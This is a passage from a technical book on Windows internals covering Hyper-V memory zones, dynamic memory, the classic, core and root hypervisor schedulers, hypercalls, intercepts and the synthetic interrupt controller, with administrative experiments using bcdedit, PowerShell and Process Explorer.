that no other VP is scheduled in the other sibling SMT thread.
Figure 9-9 The Hyperclear mitigation.
Unlike the NT kernel, the hypervisor always runs with a single page table
root, which creates a single global virtual address space. The hypervisor
defines the concept of private address space, which has a misleading name.
Indeed, the hypervisor reserves two global root page table entries (PML4
entries, which generate a 1-TB virtual address range) for mapping or
unmapping a private address space. When the hypervisor initially constructs
the VP, it allocates two private page table root entries. Those will be used to
map the VP’s secret data, like its stack and data structures that contain
private data. Switching the address space means writing the two entries in the
global page table root (which explains why the term private address space
has a misleading name—actually it is private address range). The hypervisor
switches private address spaces only in two cases: when a new virtual
processor is created and during thread switches. (Remember, threads are
backed by VPs. The core scheduler assures that no sibling SMT threads
execute VPs from different partitions.) During runtime, a hypervisor thread
has mapped only its own VP’s private data; no other secret data is accessible
by that thread.
Mapping secret data in the private address space is achieved by using the
memory zone, represented by an MM_ZONE data structure. A memory zone
encapsulates a private VA subrange of the private address space, where the
hypervisor usually stores per-VP’s secrets.
The memory zone works similarly to the private address space. Instead of
mapping root page table entries in the global page table root, a memory zone
maps private page directories in the two root entries used by the private
address space. A memory zone maintains an array of page directories, which
will be mapped and unmapped into the private address space, and a bitmap
that keeps track of the used page tables. Figure 9-10 shows the relationship
between a private address space and a memory zone. Memory zones can be
mapped and unmapped on demand (in the private address space) but are
usually switched only at VP creation time. Indeed, the hypervisor does not
need to switch them during thread switches; the private address space
encapsulates the VA range exposed by the memory zone.
Figure 9-10 The hypervisor’s private address spaces and private memory
zones.
In Figure 9-10, the page table’s structures related to the private address
space are filled with a pattern, the ones related to the memory zone are
shown in gray, and the shared ones belonging to the hypervisor are drawn
with a dashed line. Switching private address spaces is a relatively cheap
operation that requires the modification of two PML4 entries in the
hypervisor’s page table root. Attaching or detaching a memory zone from the
private address space requires only the modification of the zone’s PDPTE (a
zone VA size is variable; the PDTPE are always allocated contiguously).
Dynamic memory
Virtual machines can use a different percentage of their allocated physical
memory. For example, some virtual machines use only a small amount of
their assigned guest physical memory, keeping a lot of it freed or zeroed. The
performance of other virtual machines can instead suffer for high-memory
pressure scenarios, where the page file is used too often because the allocated
guest physical memory is not enough. With the goal to prevent the described
scenario, the hypervisor and the virtualization stack supports the concept of
dynamic memory. Dynamic memory is the ability to dynamically assign and
remove physical memory to a virtual machine. The feature is provided by
multiple components:
■ The NT kernel’s memory manager, which supports hot add and hot
removal of physical memory (on bare-metal system too)
■ The hypervisor, through the SLAT (managed by the address manager)
■ The VM Worker process, which uses the dynamic memory controller
module, Vmdynmem.dll, to establish a connection to the VMBus
Dynamic Memory VSC driver (Dmvsc.sys), which runs in the child
partition
To properly describe dynamic memory, we should quickly introduce how
the page frame number (PFN) database is created by the NT kernel. The PFN
database is used by Windows to keep track of physical memory. It was
discussed in detail in Chapter 5 of Part 1. For creating the PFN database, the
NT kernel first calculates the hypothetical size needed to map the highest
possible physical address (256 TB on standard 64-bit systems) and then
marks the VA space needed to map it entirely as reserved (storing the base
address to the MmPfnDatabase global variable). Note that the reserved VA
space still has no page tables allocated. The NT kernel cycles between each
physical memory descriptor discovered by the boot manager (using UEFI
services), coalesces them in the longest ranges possible and, for each range,
maps the underlying PFN database entries using large pages. This has an
important implication; as shown in Figure 9-11, the PFN database has space
for the highest possible amount of physical memory but only a small subset
of it is mapped to real physical pages (this technique is called sparse
memory).
Figure 9-11 An example of a PFN database where some physical memory
has been removed.
Hot add and removal of physical memory works thanks to this principle.
When new physical memory is added to the system, the Plug and Play
memory driver (Pnpmem.sys) detects it and calls the
MmAddPhysicalMemory routine, which is exported by the NT kernel. The
latter starts a complex procedure that calculates the exact number of pages in
the new range and the Numa node to which they belong, and then it maps the
new PFN entries in the database by creating the necessary page tables in the
reserved VA space. The new physical pages are added to the free list (see
Chapter 5 in Part 1 for more details).
When some physical memory is hot removed, the system performs an
inverse procedure. It checks that the pages belong to the correct physical
page list, updates the internal memory counters (like the total number of
physical pages), and finally frees the corresponding PFN entries, meaning
that they all will be marked as “bad.” The memory manager will never use
the physical pages described by them anymore. No actual virtual space is
unmapped from the PFN database. The physical memory that was described
by the freed PFNs can always be re-added in the future.
When an enlightened VM starts, the dynamic memory driver (Dmvsc.sys)
detects whether the child VM supports the hot add feature; if so, it creates a
worker thread that negotiates the protocol and connects to the VMBus
channel of the VSP. (See the “Virtualization stack” section later in this
chapter for details about VSC and VSP.) The VMBus connection channel
connects the dynamic memory driver running in the child partition to the
dynamic memory controller module (Vmdynmem.dll), which is mapped in
the VM Worker process in the root partition. A message exchange protocol is
started. Every one second, the child partition acquires a memory pressure
report by querying different performance counters exposed by the memory
manager (global page-file usage; number of available, committed, and dirty
pages; number of page faults per seconds; number of pages in the free and
zeroed page list). The report is then sent to the root partition.
The VM Worker process in the root partition uses the services exposed by
the VMMS balancer, a component of the VmCompute service, for
performing the calculation needed for determining the possibility to perform
a hot add operation. If the memory status of the root partition allowed a hot
add operation, the VMMS balancer calculates the proper number of pages to
deposit in the child partition and calls back (through COM) the VM Worker
process, which starts the hot add operation with the assistance of the VID
driver:
1.
Reserves the proper amount of physical memory in the root partition
2.
Calls the hypervisor with the goal to map the system physical pages
reserved by the root partition to some guest physical pages mapped in
the child VM, with the proper protection
3.
Sends a message to the dynamic memory driver for starting a hot add
operation on some guest physical pages previously mapped by the
hypervisor
The dynamic memory driver in the child partition uses the
MmAddPhysicalMemory API exposed by the NT kernel to perform the hot
add operation. The latter maps the PFNs describing the new guest physical
memory in the PFN database, adding new backing pages to the database if
needed.
In a similar way, when the VMMS balancer detects that the child VM has
plenty of physical pages available, it may require the child partition (still
through the VM Worker process) to hot remove some physical pages. The
dynamic memory driver uses the MmRemovePhysicalMemory API to
perform the hot remove operation. The NT kernel verifies that each page in
the range specified by the balancer is either on the zeroed or free list, or it
belongs to a stack that can be safely paged out. If all the conditions apply, the
dynamic memory driver sends back the “hot removal” page range to the VM
Worker process, which will use services provided by the VID driver to
unmap the physical pages from the child partition and release them back to
the NT kernel.
Note
Dynamic memory is not supported when nested virtualization is enabled.
Hyper-V schedulers
The hypervisor is a kind of micro operating system that runs below the root
partition’s OS (Windows). As such, it should be able to decide which thread
(backing a virtual processor) is being executed by which physical processor.
This is especially true when the system runs multiple virtual machines
composed in total by more virtual processors than the physical processors
installed in the workstation. The hypervisor scheduler role is to select the
next thread that a physical CPU is executing after the allocated time slice of
the current one ends. Hyper-V can use three different schedulers. To properly
manage all the different schedulers, the hypervisor exposes the scheduler
APIs, a set of routines that are the only entries into the hypervisor scheduler.
Their sole purpose is to redirect API calls to the particular scheduler
implementation.
EXPERIMENT: Controlling the hypervisor’s
scheduler type
Whereas client editions of Windows start by default with the root
scheduler, Windows Server 2019 runs by default with the core
scheduler. In this experiment, you figure out the hypervisor
scheduler enabled on your system and find out how to switch to
another kind of hypervisor scheduler on the next system reboot.
The Windows hypervisor logs a system event after it has
determined which scheduler to enable. You can search the logged
event by using the Event Viewer tool, which you can run by typing
eventvwr in the Cortana search box. After the applet is started,
expand the Windows Logs key and click the System log. You
should search for events with ID 2 and the Event sources set to
Hyper-V-Hypervisor. You can do that by clicking the Filter
Current Log button located on the right of the window or by
clicking the Event ID column, which will order the events in
ascending order by their ID (keep in mind that the operation can
take a while). If you double-click a found event, you should see a
window like the following:
The launch event ID 2 denotes indeed the hypervisor scheduler
type, where
1 = Classic scheduler, SMT disabled
2 = Classic scheduler
3 = Core scheduler
4 = Root scheduler
The sample figure was taken from a Windows Server system,
which runs by default with the Core Scheduler. To change the
scheduler type to the classic one (or root), you should open an
administrative command prompt window (by typing cmd in the
Cortana search box and selecting Run As Administrator) and type
the following command:
Click here to view code image
bcdedit /set hypervisorschedulertype <Type>
where <Type> is Classic for the classic scheduler, Core for the
core scheduler, or Root for the root scheduler. You should restart
the system and check again the newly generated Hyper-V-
Hypervisor event ID 2. You can also check the current enabled
hypervisor scheduler by using an administrative PowerShell
window with the following command:
Click here to view code image
Get-WinEvent -FilterHashTable @{ProviderName="Microsoft-
Windows-Hyper-V-Hypervisor"; ID=2}
-MaxEvents 1
The command extracts the last Event ID 2 from the System
event log.
The classic scheduler
The classic scheduler has been the default scheduler used on all versions of
Hyper-V since its initial release. The classic scheduler in its default
configuration implements a simple, round-robin policy in which any virtual
processor in the current execution state (the execution state depends on the
total number of VMs running in the system) is equally likely to be
dispatched. The classic scheduler supports also setting a virtual processor’s
affinity and performs scheduling decisions considering the physical
processor’s NUMA node. The classic scheduler doesn’t know what a guest
VP is currently executing. The only exception is defined by the spin-lock
enlightenment. When the Windows kernel, which is running in a partition, is
going to perform an active wait on a spin-lock, it emits a hypercall with the
goal to inform the hypervisor (high IRQL synchronization mechanisms are
described in Chapter 8, “System mechanisms”). The classic scheduler can
preempt the current executing virtual processor (which hasn’t expired its
allocated time slice yet) and can schedule another one. In this way it saves the
active CPU spin cycles.
The default configuration of the classic scheduler assigns an equal time
slice to each VP. This means that in high-workload oversubscribed systems,
where multiple virtual processors attempt to execute, and the physical
processors are sufficiently busy, performance can quickly degrade. To
overcome the problem, the classic scheduler supports different fine-tuning
options (see Figure 9-12), which can modify its internal scheduling decision:
■ VP reservations A user can reserve the CPU capacity in advance on
behalf of a guest machine. The reservation is specified as the
percentage of the capacity of a physical processor to be made
available to the guest machine whenever it is scheduled to run. As a
result, Hyper-V schedules the VP to run only if that minimum amount
of CPU capacity is available (meaning that the allocated time slice is
guaranteed).
■ VP limits Similar to VP reservations, a user can limit the percentage
of physical CPU usage for a VP. This means reducing the available
time slice allocated to a VP in a high workload scenario.
■ VP weight This controls the probability that a VP is scheduled when
the reservations have already been met. In default configurations,
each VP has an equal probability of being executed. When the user
configures weight on the VPs that belong to a virtual machine,
scheduling decisions become based on the relative weighting factor
the user has chosen. For example, let’s assume that a system with four
CPUs runs three virtual machines at the same time. The first VM has
set a weighting factor of 100, the second 200, and the third 300.
Assuming that all the system’s physical processors are allocated to a
uniform number of VPs, the probability of a VP in the first VM to be
dispatched is 17%, of a VP in the second VM is 33%, and of a VP in
the third one is 50%.
Figure 9-12 The classic scheduler fine-tuning settings property page,
which is available only when the classic scheduler is enabled.
The core scheduler
Normally, a classic CPU’s core has a single execution pipeline in which
streams of instructions are executed one after each other. An instruction
enters the pipe, proceeds through several stages of execution (load data,
compute, store data, for example), and is retired from the pipe. Different
types of instructions use different parts of the CPU core. A modern CPU’s
core is often able to execute in an out-of-order way multiple sequential
instructions in the stream (in respect to the order in which they entered the
pipeline). Modern CPUs, which support out-of-order execution, often
implement what is called symmetric multithreading (SMT): a CPU’s core has
two execution pipelines and presents more than one logical processor to the
system; thus, two different instruction streams can be executed side by side
by a single shared execution engine. (The resources of the core, like its
caches, are shared.) The two execution pipelines are exposed to the software
as single independent processors (CPUs). From now on, with the term logical
processor (or simply LP), we will refer to an execution pipeline of an SMT
core exposed to Windows as an independent CPU. (SMT is discussed in
Chapters 2 and 4 of Part 1.)
This hardware implementation has led to many security problems: one
instruction executed by a shared logical CPU can interfere and affect the
instruction executed by the other sibling LP. Furthermore, the physical core’s
cache memory is shared; an LP can alter the content of the cache. The other
sibling CPU can potentially probe the data located in the cache by measuring
the time employed by the processor to access the memory addressed by the
same cache line, thus revealing “secret data” accessed by the other logical
processor (as described in the “Hardware side-channel vulnerabilities”
section of Chapter 8). The classic scheduler can normally select two threads
belonging to different VMs to be executed by two LPs in the same processor
core. This is clearly not acceptable because in this context, the first virtual
machine could potentially read data belonging to the other one.
To overcome this problem, and to be able to run SMT-enabled VMs with
predictable performance, Windows Server 2016 has introduced the core
scheduler. The core scheduler leverages the properties of SMT to provide
isolation and a strong security boundary for guest VPs. When the core
scheduler is enabled, Hyper-V schedules virtual cores onto physical cores.
Furthermore, it ensures that VPs belonging to different VMs are never
scheduled on sibling SMT threads of a physical core. The core scheduler
enables the virtual machine for making use of SMT. The VPs exposed to a
VM can be part of an SMT set. The OS and applications running in the guest
virtual machine can use SMT behavior and programming interfaces (APIs) to
control and distribute work across SMT threads, just as they would when run
nonvirtualized.
Figure 9-13 shows an example of an SMT system with four logical
processors distributed in two CPU cores. In the figure, three VMs are
running. The first and second VMs have four VPs in two groups of two,
whereas the third one has only one assigned VP. The groups of VPs in the
VMs are labelled A through E. Individual VPs in a group that are idle (have
no code to execute) are filled with a darker color.
Figure 9-13 A sample SMT system with two processors’ cores and three
VMs running.
Each core has a run list containing groups of VPs that are ready to execute,
and a deferred list of groups of VPs that are ready to run but have not been
added to the core’s run list yet. The groups of VPs execute on the physical
cores. If all VPs in a group become idle, then the VP group is descheduled
and does not appear on any run list. (In Figure 9-13, this is the situation for
VP group D.) The only VP of the group E has recently left the idle state. The
VP has been assigned to the CPU core 2. In the figure, a dummy sibling VP
is shown. This is because the LP of core 2 never schedules any other VP
while its sibling LP of its core is executing a VP belonging to the VM 3. In
the same way, no other VPs are scheduled on a physical core if one VP in the
LP group became idle but the other is still executing (such as for group A, for
example). Each core executes the VP group that is at the head of its run list.
If there are no VP groups to execute, the core becomes idle and waits for a
VP group to be deposited onto its deferred run list. When this occurs, the
core wakes up from idle and empties its deferred run list, placing the contents
onto its run list.
The core scheduler is implemented by different components (see Figure 9-
14) that provide strict layering between each other. The heart of the core
scheduler is the scheduling unit, which represents a virtual core or group of
SMT VPs. (For non-SMT VMs, it represents a single VP.) Depending on the
VM’s type, the scheduling unit has either one or two threads bound to it. The
hypervisor’s process owns a list of scheduling units, which own threads
backing up to VPs belonging to the VM. The scheduling unit is the single
unit of scheduling for the core scheduler to which scheduling settings—such
as reservation, weight, and cap—are applied during runtime. A scheduling
unit stays active for the duration of a time slice, can be blocked and
unblocked, and can migrate between different physical processor cores. An
important concept is that the scheduling unit is analogous to a thread in the
classic scheduler, but it doesn’t have a stack or VP context in which to run.
It’s one of the threads bound to a scheduling unit that runs on a physical
processor core. The thread gang scheduler is the arbiter for each scheduling
unit. It’s the entity that decides which thread from the active scheduling unit
gets run by which LP from the physical processor core. It enforces thread
affinities, applies thread scheduling policies, and updates the related counters
for each thread.
Figure 9-14 The components of the core scheduler.
Each LP of the physical processor’s core has an instance of a logical
processor dispatcher associated with it. The logical processor dispatcher is
responsible for switching threads, maintaining timers, and flushing the
VMCS (or VMCB, depending on the architecture) for the current thread.
Logical processor dispatchers are owned by the core dispatcher, which
represents a physical single processor core and owns exactly two SMT LPs.
The core dispatcher manages the current (active) scheduling unit. The unit
scheduler, which is bound to its own core dispatcher, decides which
scheduling unit needs to run next on the physical processor core the unit
scheduler belongs to. The last important component of the core scheduler is
the scheduler manager, which owns all the unit schedulers in the system and
has a global view of all their states. It provides load balancing and ideal core
assignment services to the unit scheduler.
The root scheduler
The root scheduler (also known as integrated scheduler) was introduced in
Windows 10 April 2018 Update (RS4) with the goal to allow the root
partition to schedule virtual processors (VPs) belonging to guest partitions.
The root scheduler was designed with the goal to support lightweight
containers used by Windows Defender Application Guard. Those types of
containers (internally called Barcelona or Krypton containers) must be
managed by the root partition and should consume a small amount of
memory and hard-disk space. (Deeply describing Krypton containers is
outside the scope of this book. You can find an introduction of server
containers in Part 1, Chapter 3, “Processes and jobs”). In addition, the root
OS scheduler can readily gather metrics about workload CPU utilization
inside the container and use this data as input to the same scheduling policy
applicable to all other workloads in the system.
The NT scheduler in the root partition’s OS instance manages all aspects
of scheduling work to system LPs. To achieve that, the integrated scheduler’s
root component inside the VID driver creates a VP-dispatch thread inside of
the root partition (in the context of the new VMMEM process) for each guest
VP. (VA-backed VMs are discussed later in this chapter.) The NT scheduler
in the root partition schedules VP-dispatch threads as regular threads subject
to additional VM/VP-specific scheduling policies and enlightenments. Each
VP-dispatch thread runs a VP-dispatch loop until the VID driver terminates
the corresponding VP.
The VP-dispatch thread is created by the VID driver after the VM Worker
Process (VMWP), which is covered in the “Virtualization stack” section later
in this chapter, has requested the partition and VPs creation through the
SETUP_PARTITION IOCTL. The VID driver communicates with the
WinHvr driver, which in turn initializes the hypervisor’s guest partition
creation (through the HvCreatePartition hypercall). In case the created
partition represents a VA-backed VM, or in case the system has the root
scheduler active, the VID driver calls into the NT kernel (through a kernel
extension) with the goal to create the VMMEM minimal process associated
with the new guest partition. The VID driver also creates a VP-dispatch
thread for each VP belonging to the partition. The VP-dispatch thread
executes in the context of the VMMEM process in kernel mode (no user
mode code exists in VMMEM) and is implemented in the VID driver (and
WinHvr). As shown in Figure 9-15, each VP-dispatch thread runs a VP-
dispatch loop until the VID terminates the corresponding VP or an intercept
is generated from the guest partition.
Figure 9-15 The root scheduler’s VP-dispatch thread and the associated
VMWP worker thread that processes the hypervisor’s messages.
While in the VP-dispatch loop, the VP-dispatch thread is responsible for
the following:
1.
Call the hypervisor’s new HvDispatchVp hypercall interface to
dispatch the VP on the current processor. On each HvDispatchVp
hypercall, the hypervisor tries to switch context from the current root
VP to the specified guest VP and let it run the guest code. One of the
most important characteristics of this hypercall is that the code that
emits it should run at PASSIVE_LEVEL IRQL. The hypervisor lets the
guest VP run until either the VP blocks voluntarily, the VP generates
an intercept for the root, or there is an interrupt targeting the root VP.
Clock interrupts are still processed by the root partitions. When the
guest VP exhausts its allocated time slice, the VP-backing thread is
preempted by the NT scheduler. On any of the three events, the
hypervisor switches back to the root VP and completes the
HvDispatchVp hypercall. It then returns to the root partition.
2.
Block on the VP-dispatch event if the corresponding VP in the
hypervisor is blocked. Anytime the guest VP is blocked voluntarily,
the VP-dispatch thread blocks itself on a VP-dispatch event until the
hypervisor unblocks the corresponding guest VP and notifies the VID
driver. The VID driver signals the VP-dispatch event, and the NT
scheduler unblocks the VP-dispatch thread that can make another
HvDispatchVp hypercall.
3.
Process all intercepts reported by the hypervisor on return from the
dispatch hypercall. If the guest VP generates an intercept for the root,
the VP-dispatch thread processes the intercept request on return from
the HvDispatchVp hypercall and makes another HvDispatchVp
request after the VID completes processing of the intercept. Each
intercept is managed differently. If the intercept requires processing
from the user mode VMWP process, the WinHvr driver exits the loop
and returns to the VID, which signals an event for the backed VMWP
thread and waits for the intercept message to be processed by the
VMWP process before restarting the loop.
To properly deliver signals to VP-dispatch threads from the hypervisor to
the root, the integrated scheduler provides a scheduler message exchange
mechanism. The hypervisor sends scheduler messages to the root partition
via a shared page. When a new message is ready for delivery, the hypervisor
injects a SINT interrupt into the root, and the root delivers it to the
corresponding ISR handler in the WinHvr driver, which routes the message
to the VID intercept callback (VidInterceptIsrCallback). The intercept
callback tries to handle the intercept message directly from the VID driver. In
case the direct handling is not possible, a synchronization event is signaled,
which allows the dispatch loop to exit and allows one of the VmWp worker
threads to dispatch the intercept in user mode.
Context switches when the root scheduler is enabled are more expensive
compared to other hypervisor scheduler implementations. When the system
switches between two guest VPs, for example, it always needs to generate
two exits to the root partitions. The integrated scheduler treats hypervisor’s
root VP threads and guest VP threads very differently (they are internally
represented by the same TH_THREAD data structure, though):
■ Only the root VP thread can enqueue a guest VP thread to its physical
processor. The root VP thread has priority over any guest VP that is
running or being dispatched. If the root VP is not blocked, the
integrated scheduler tries its best to switch the context to the root VP
thread as soon as possible.
■ A guest VP thread has two sets of states: thread internal states and
thread root states. The thread root states reflect the states of the VP-
dispatch thread that the hypervisor communicates to the root partition.
The integrated scheduler maintains those states for each guest VP
thread to know when to send a wake-up signal for the corresponding
VP-dispatch thread to the root.
Only the root VP can initiate a dispatch of a guest VP for its processor. It
can do that either because of HvDispatchVp hypercalls (in this situation, we
say that the hypervisor is processing “external work”), or because of any
other hypercall that requires sending a synchronous request to the target
guest VP (this is what is defined as “internal work”). If the guest VP last ran
on the current physical processor, the scheduler can dispatch the guest VP
thread right away. Otherwise, the scheduler needs to send a flush request to
the processor on which the guest VP last ran and wait for the remote
processor to flush the VP context. The latter case is defined as “migration”
and is a situation that the hypervisor needs to track (through the thread
internal states and root states, which are not described here).
EXPERIMENT: Playing with the root scheduler
The NT scheduler decides when to select and run a virtual
processor belonging to a VM and for how long. This experiment
demonstrates what we have discussed previously: All the VP
dispatch threads execute in the context of the VMMEM process,
created by the VID driver. For the experiment, you need a
workstation with at least Windows 10 April 2018 update (RS4)
installed, along with the Hyper-V role enabled and a VM with any
operating system installed ready for use. The procedure for creating
a VM is explained in detail here: https://docs.microsoft.com/en-
us/virtualization/hyper-v-on-windows/quick-start/quick-create-
virtual-machine.
First, you should verify that the root scheduler is enabled.
Details on the procedure are available in the “Controlling the
hypervisor’s scheduler type” experiment earlier in this chapter. The
VM used for testing should be powered down.
Open the Task Manager by right-clicking on the task bar and
selecting Task Manager, click the Details sheet, and verify how
many VMMEM processes are currently active. In case no VMs are
running, there should be none of them; in case the Windows
Defender Application Guard (WDAG) role is installed, there could
be an existing VMMEM process instance, which hosts the
preloaded WDAG container. (This kind of VM is described later in
the “VA-backed virtual machines” section.) In case a VMMEM
process instance exists, you should take note of its process ID
(PID).
Open the Hyper-V Manager by typing Hyper-V Manager in the
Cortana search box and start your virtual machine. After the VM
has been started and the guest operating system has successfully
booted, switch back to the Task Manager and search for a new
VMMEM process. If you click the new VMMEM process and
expand the User Name column, you can see that the process has
been associated with a token owned by a user named as the VM’s
GUID. You can obtain your VM’s GUID by executing the
following command in an administrative PowerShell window
(replace the term “<VmName>” with the name of your VM):
Click here to view code image
Get-VM -VmName "<VmName>" | ft VMName, VmId
The VM ID and the VMMEM process’s user name should be the
same, as shown in the following figure.
Install Process Explorer (by downloading it from
https://docs.microsoft.com/en-us/sysinternals/downloads/process-
explorer), and run it as administrator. Search the PID of the correct
VMMEM process identified in the previous step (27312 in the
example), right-click it, and select Suspend”. The CPU tab of the
VMMEM process should now show “Suspended” instead of the
correct CPU time.
If you switch back to the VM, you will find that it is
unresponsive and completely stuck. This is because you have
suspended the process hosting the dispatch threads of all the virtual
processors belonging to the VM. This prevented the NT kernel
from scheduling those threads, which won’t allow the WinHvr
driver to emit the needed HvDispatchVp hypercall used to resume
the VP execution.
If you right-click the suspended VMMEM and select Resume,
your VM resumes its execution and continues to run correctly.
Hypercalls and the hypervisor TLFS
Hypercalls provide a mechanism to the operating system running in the root
or the in the child partition to request services from the hypervisor.
Hypercalls have a well-defined set of input and output parameters. The
hypervisor Top Level Functional Specification (TLFS) is available online
(https://docs.microsoft.com/en-us/virtualization/hyper-v-on-
windows/reference/tlfs); it defines the different calling conventions used
while specifying those parameters. Furthermore, it lists all the publicly
available hypervisor features, partition’s properties, hypervisor, and VSM
interfaces.
Hypercalls are available because of a platform-dependent opcode
(VMCALL for Intel systems, VMMCALL for AMD, HVC for ARM64)
which, when invoked, always cause a VM_EXIT into the hypervisor.
VM_EXITs are events that cause the hypervisor to restart to execute its own
code in the hypervisor privilege level, which is higher than any other
software running in the system (except for firmware’s SMM context), while
the VP is suspended. VM_EXIT events can be generated from various
reasons. In the platform-specific VMCS (or VMCB) opaque data structure
the hardware maintains an index that specifies the exit reason for the
VM_EXIT. The hypervisor gets the index, and, in case of an exit caused by a
hypercall, reads the hypercall input value specified by the caller (generally
from a CPU’s general-purpose register—RCX in the case of 64-bit Intel and
AMD systems). The hypercall input value (see Figure 9-16) is a 64-bit value
that specifies the hypercall code, its properties, and the calling convention
used for the hypercall. Three kinds of calling conventions are available:
■ Standard hypercalls Store the input and output parameters on 8-byte
aligned guest physical addresses (GPAs). The OS passes the two
addresses via general-purposes registers (RDX and R8 on Intel and
AMD 64-bit systems).
■ Fast hypercalls Usually don’t allow output parameters and employ
the two general-purpose registers used in standard hypercalls to pass
only input parameters to the hypervisor (up to 16 bytes in size).
■ Extended fast hypercalls (or XMM fast hypercalls) Similar to fast
hypercalls, but these use an additional six floating-point registers to
allow the caller to pass input parameters up to 112 bytes in size.
Figure 9-16 The hypercall input value (from the hypervisor TLFS).
There are two classes of hypercalls: simple and rep (which stands for
“repeat”). A simple hypercall performs a single operation and has a fixed-size
set of input and output parameters. A rep hypercall acts like a series of
simple hypercalls. When a caller initially invokes a rep hypercall, it specifies
a rep count that indicates the number of elements in the input or output
parameter list. Callers also specify a rep start index that indicates the next
input or output element that should be consumed.
All hypercalls return another 64-bit value called hypercall result value (see
Figure 9-17). Generally, the result value describes the operation’s outcome,
and, for rep hypercalls, the total number of completed repetition.
Figure 9-17 The hypercall result value (from the hypervisor TLFS).
Hypercalls could take some time to be completed. Keeping a physical CPU
that doesn‘t receive interrupts can be dangerous for the host OS. For
example, Windows has a mechanism that detects whether a CPU has not
received its clock tick interrupt for a period of time longer than 16
milliseconds. If this condition is detected, the system is suddenly stopped
with a BSOD. The hypervisor therefore relies on a hypercall continuation
mechanism for some hypercalls, including all rep hypercall forms. If a
hypercall isn’t able to complete within the prescribed time limit (usually 50
microseconds), control is returned back to the caller (through an operation
called VM_ENTRY), but the instruction pointer is not advanced past the
instruction that invoked the hypercall. This allows pending interrupts to be
handled and other virtual processors to be scheduled. When the original
calling thread resumes execution, it will re-execute the hypercall instruction
and make forward progress toward completing the operation.
A driver usually never emits a hypercall directly through the platform-
dependent opcode. Instead, it uses services exposed by the Windows
hypervisor interface driver, which is available in two different versions:
■ WinHvr.sys Loaded at system startup if the OS is running in the root
partition and exposes hypercalls available in both the root and child
partition.
■ WinHv.sys Loaded only when the OS is running in a child partition.
It exposes hypercalls available in the child partition only.
Routines and data structures exported by the Windows hypervisor
interface driver are extensively used by the virtualization stack, especially by
the VID driver, which, as we have already introduced, covers a key role in
the functionality of the entire Hyper-V platform.
Intercepts
The root partition should be able to create a virtual environment that allows
an unmodified guest OS, which was written to execute on physical hardware,
to run in a hypervisor’s guest partition. Such legacy guests may attempt to
access physical devices that do not exist in a hypervisor partition (for
example, by accessing certain I/O ports or by writing to specific MSRs). For
these cases, the hypervisor provides the host intercepts facility; when a VP of
a guest VM executes certain instructions or generates certain exceptions, the
authorized root partition can intercept the event and alter the effect of the
intercepted instruction such that, to the child, it mirrors the expected behavior
in physical hardware.
When an intercept event occurs in a child partition, its VP is suspended,
and an intercept message is sent to the root partition by the Synthetic
Interrupt Controller (SynIC; see the following section for more details) from
the hypervisor. The message is received thanks to the hypervisor’s Synthetic
ISR (Interrupt Service Routine), which the NT kernel installs during phase 0
of its startup only in case the system is enlightened and running under the
hypervisor (see Chapter 12 for more details). The hypervisor synthetic ISR
(KiHvInterrupt), usually installed on vector 0x30, transfers its execution to
an external callback, which the VID driver has registered when it started
(through the exposed HvlRegisterInterruptCallback NT kernel API).
The VID driver is an intercept driver, meaning that it is able to register
host intercepts with the hypervisor and thus receives all the intercept events
that occur on child partitions. After the partition is initialized, the WM
Worker process registers intercepts for various components of the
virtualization stack. (For example, the virtual motherboard registers I/O
intercepts for each virtual COM ports of the VM.) It sends an IOCTL to the
VID driver, which uses the HvInstallIntercept hypercall to install the
intercept on the child partition. When the child partition raises an intercept,
the hypervisor suspends the VP and injects a synthetic interrupt in the root
partition, which is managed by the KiHvInterrupt ISR. The latter routine
transfers the execution to the registered VID Intercept callback, which
manages the event and restarts the VP by clearing the intercept suspend
synthetic register of the suspended VP.
The hypervisor supports the interception of the following events in the
child partition:
■ Access to I/O ports (read or write)
■ Access to VP’s MSR (read or write)
■ Execution of CPUID instruction
■ Exceptions
■ Accesses to general purposes registers
■ Hypercalls
The synthetic interrupt controller (SynIC)
The hypervisor virtualizes interrupts and exceptions for both the root and
guest partitions through the synthetic interrupt controller (SynIC), which is an
extension of a virtualized local APIC (see the Intel or AMD software
developer manual for more details about the APIC). The SynIC is responsible
for dispatching virtual interrupts to virtual processors (VPs). Interrupts
delivered to a partition fall into two categories: external and synthetic (also
known as internal or simply virtual interrupts). External interrupts originate
from other partitions or devices; synthetic interrupts are originated from the
hypervisor itself and are targeted to a partition’s VP.
When a VP in a partition is created, the hypervisor creates and initializes a
SynIC for each supported VTL. It then starts the VTL 0’s SynIC, which
means that it enables the virtualization of a physical CPU’s APIC in the
VMCS (or VMCB) hardware data structure. The hypervisor supports three
kinds of APIC virtualization while dealing with external hardware interrupts:
■ In standard configuration, the APIC is virtualized through the event
injection hardware support. This means that every time a partition
accesses the VP’s local APIC registers, I/O ports, or MSRs (in the
case of x2APIC), it produces a VMEXIT, causing hypervisor codes to
dispatch the interrupt through the SynIC, which eventually “injects”
an event to the correct guest VP by manipulating VMCS/VMCB
opaque fields (after it goes through the logic similar to a physical
APIC, which determines whether the interrupt can be delivered).
■ The APIC emulation mode works similar to the standard
configuration. Every physical interrupt sent by the hardware (usually
through the IOAPIC) still causes a VMEXIT, but the hypervisor does
not have to inject any event. Instead, it manipulates a virtual-APIC
page used by the processor to virtualize certain access to the APIC
registers. When the hypervisor wants to inject an event, it simply
manipulates some virtual registers mapped in the virtual-APIC page.
The event is delivered by the hardware when a VMENTRY happens.
At the same time, if a guest VP manipulates certain parts of its local
APIC, it does not produce any VMEXIT, but the modification will be
stored in the virtual-APIC page.
■ Posted interrupts allow certain kinds of external interrupts to be
delivered directly in the guest partition without producing any
VMEXIT. This allows direct access devices to be mapped directly in
the child partition without incurring any performance penalties caused
by the VMEXITs. The physical processor processes the virtual
interrupts by directly recording them as pending on the virtual-APIC
page. (For more details, consult the Intel or AMD software developer
manual.)
When the hypervisor starts a processor, it usually initializes the synthetic
interrupt controller module for the physical processor (represented by a
CPU_PLS data structure). The SynIC module of the physical processor is an
array of an interrupt’s descriptors, which make the connection between a
physical interrupt and a virtual interrupt. A hypervisor interrupt descriptor
(IDT entry), as shown in Figure 9-18, contains the data needed for the SynIC
to correctly dispatch the interrupt, in particular the entity the interrupt is
delivered to (a partition, the hypervisor, a spurious interrupt), the target VP
(root, a child, multiple VPs, or a synthetic interrupt), the interrupt vector, the
target VTL, and some other interrupt characteristics.
Figure 9-18 The hypervisor physical interrupt descriptor.
In default configurations, all the interrupts are delivered to the root
partition in VTL 0 or to the hypervisor itself (in the second case, the interrupt
entry is Hypervisor Reserved). External interrupts can be delivered to a guest
partition only when a direct access device is mapped into a child partition;
NVMe devices are a good example.
Every time the thread backing a VP is selected for being executed, the
